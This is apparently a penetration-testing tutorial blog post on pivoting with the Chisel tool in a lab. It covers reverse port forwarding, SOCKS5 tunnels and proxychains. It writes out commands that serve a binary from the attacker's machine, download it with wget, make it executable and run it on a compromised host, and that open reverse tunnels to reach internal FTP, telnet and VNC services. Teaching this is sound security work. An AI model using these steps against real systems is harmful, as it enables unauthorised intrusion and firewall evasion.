Port forwarding in a computer network, also known as port mapping of network address transition (NAT), redirects a communication request from one address and port number combination to another while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted traffic off. A network administrator uses one IP address for all external communications on the internet while dedicating multiple servers with different IPS and ports internally to do various tasks based on organization requirements.
Chisel is open-sourced tool written in Go (Golang) language, mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. It is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. In addition, it requires two things to establish a connection between a remote host and the attacking box, where the attacking box will act as the server and the remote host as a client.
We are establishing a connection with the remote host with valid credentials. The remote host can be a target and tunneling point for the next hop. If there is another hop we can connect with, then the remote host will act as a routing point. We connected as the pentest user with the host using SSH protocol which stands for secure socket shell and transmits data in encrypted form. Once we connect with the remote host, we will view the internal network status, which can be achieved using the following commands.
-a all interface
-n show ip address
-t show tcp connections
-p show process id/name
ssh [email protected] netstat -antp
Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can install it using the below command.
apt install chisel
In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.
Once our Chisel server is ready and reverse tunneling is enabled, we will be required to transfer a chisel binary to the remote host. The chisel binaries can be downloaded from the official repository based on the system architecture. All the latest available binaries can be found by accessing the releases tab. As we will test it on a Linux system with AMD64 architecture, we selected the highlighted one.
Download link: https://github.com/jpillora/chisel/releases
After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target system to set up a chisel as a client. To transfer the file, we set up a python server in our local system, which will host our file on port 80.
gitclone https://github.com/jpillora/chisel.git gunzip chisel_1.7.7_linux_amd64.gz python3 -m http.server 80
We downloaded the chisel binary in the remote host’s /tmp directory, where everyone has full permission on files. Then we give full permission to file so we can execute it. Suppose we do not give appropriate permission to file. In that case, we cannot execute it as it is set only to read permission when we download anything in the temp directory as a low-privileged user. To establish a remote connection, we require a chisel server and a chisel client where the chisel server is the Attacking box, and the chisel server will be the target machine. As we have already set up a chisel server on port 5000 earlier, we are establishing a connection with the server. In this example, we mentioned chisel as a client and gave the server IP address and port number (5000). We then mentioned an accessing port (4444) and localhost with a port where HTTP service is hosted internally in the remote system.
wget 192.168.1.205/ chisel_1.7.7_linux_amd64 chmod 777 chisel_1.7.7_linux_amd64 ./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
There is another way to access the HTTP service using the attacker’s IP address instead of the loopback interface this time. We will be required to install a chisel in the target machine to achieve the goal. In this example, we are using the ubuntu system. As the chisel is written in Golang language, we need to install Golang in the target system using the below command.
apt install golang
Next, we download a chisel from its official repository to install it in the target system. Go build is an automatic build tool that aims to replace Make files for simple projects written in the Go programming language. It creates a dependency graph of all local imports and compiles them in the correct order using the GC Go compiler. The ldflags stands for linker flags and is used to pass in flags to the underlying linker in the Go toolchain. The -s and -w linker flags are not strictly needed, but they decrease the size of the resulting binary. By navigating the download folder of the chisel, we simply installed it with the help of go build.
git clone https://github.com/jpillora/chisel.git apt install golang go build -ldflags="-s -w"
Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last example, we accessed it from the attacking box loopback interface, connecting to the service hosted in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205) and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback (127.0.0.1) on remote port 8888.
./chisel client 192.168.1.205:5000 R:8888:localhost:8080
When a connection is established with the chisel server, we can access the HTTP service from the attacking box on port 8888.
During the internal assessment, we may come across when we compromise a system, and that system is communicating with another system using a different adaptor or a different subnet. It can be checked using ipconfig/ifconfig, where we can view if that system is connected to a different network via a different adapter. In such scenarios, local port forwarding will not work, and we have to identify which ports are open for the outbound traffic. As shown in the screenshot below, we could not establish a connection with the remote host.
To overcome this issue, we have to go through multiple steps. First, we set up a chisel server in the attacking box on port 8000.
Then we establish a connection with the chisel server from the ubuntu box mentioning remote access on socks proxy. Just like most other proxy types, SOCKS proxies hide the client’s IP address and serve when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are mainly used to facilitate communication with websites with firewalls and limit regular client access. All communication can be done on SOCKS5 proxy using utilities such as proxychains or proxychain4.
-p: listening port of the server (attacking box)
–socks5: start an internal SOCKS4/SOCKS5 proxy
–reverse: allows reverse port forwarding
We can also access an individual target’s port using the command below. We connect with the server hosted in the Attacking machine and then access the target service via a tunnel.
Also, we can specify socks proxy while setting up the chisel server. In the below example, we have set up a chisel server on port 9001 using the socks5 proxy.
All the above setup is done at the system level, but how will the browser know we want to access HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5, which depend on the version we are using. In this example, we are using SOCKS5 and port number 1080. And no proxy for the loopback interface. It can also be done using the foxyproxy addon available in Mozilla Firefox.
Now we can access the services without any issues. We can verify accessing the target HTTP service where the request will send via a proxy.
If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file using any text editor. The configuration file is located in the /etc as proxychains4.conf.
To edit the configuration file, we need to comment socks4 proxy if that is configured by default and add socks5 on the loopback interface with the port number. We can use any port, but in this example, we use port 1080.
Let’s grab the banner of ports 21, 23, and 5900. Port 21 belongs to the File transfer protocol, 23 to the telnet, and 5900 to the VNC server. FTP transfers files from different sources to different destinations, and the telnet is used for the remote connection in the command line interface. On the other hand, VNC can be used to establish a GUI-based remote connection. To grab the banners or access the remote host, we have to use proxychains before using any command so the request will be made from the tunnel that we created. From the output, it is confirmed that all three ports are open. In our command, we have used -zvn options that stand for:
-n Do not do DNS or service lookups on specified addresses, hostnames, or ports.
-v Have nc give more verbose output.
-z Specifies that nc should only scan for listening daemons without sending any data to them.
proxychains nc -zvn 192.168.146.128 21 23 5900
Telnet is a remoting protocol that does not encrypt the data while transmitting. It transmits data in a plain text format. Let’s establish a telnet connection with valid credentials msfadmin/msfadmin. As expected, we successfully established a remote connection with the remote host using telnet protocol.
proxychains telnet 192.168.146.128
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is considered an application layer protocol. Let’s connect with the same credentials we used in telnet. We connected to ftp successfully, and with ls command, we can list the available file in the directory.
proxychains ftp 192.168.146.128
In the last example, we will connect with the VNC viewer. VNC Viewer is used for local computers and mobile devices you want to control from. A device such as a computer, tablet, or smartphone with installed VNC Viewer software can access and control a computer in another location. This service runs in its default port, 5900. To establish a connection with VNC, we can use proxychains using the vncviewer utility and the remote IP address, and we will receive a GUI-based interface.
proxychains vncviewer 192.168.146.128
We have explored chisel briefly, which will make our Internal assessment much easier, especially when we come across port forwarding. We have explored multiple techniques to establish a remote session using a chisel with and without socks5 proxy. Also, we have explored proxychains role in a tunneled connection. I hope you have learned something new today. Happy hacking!
Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin and Twitter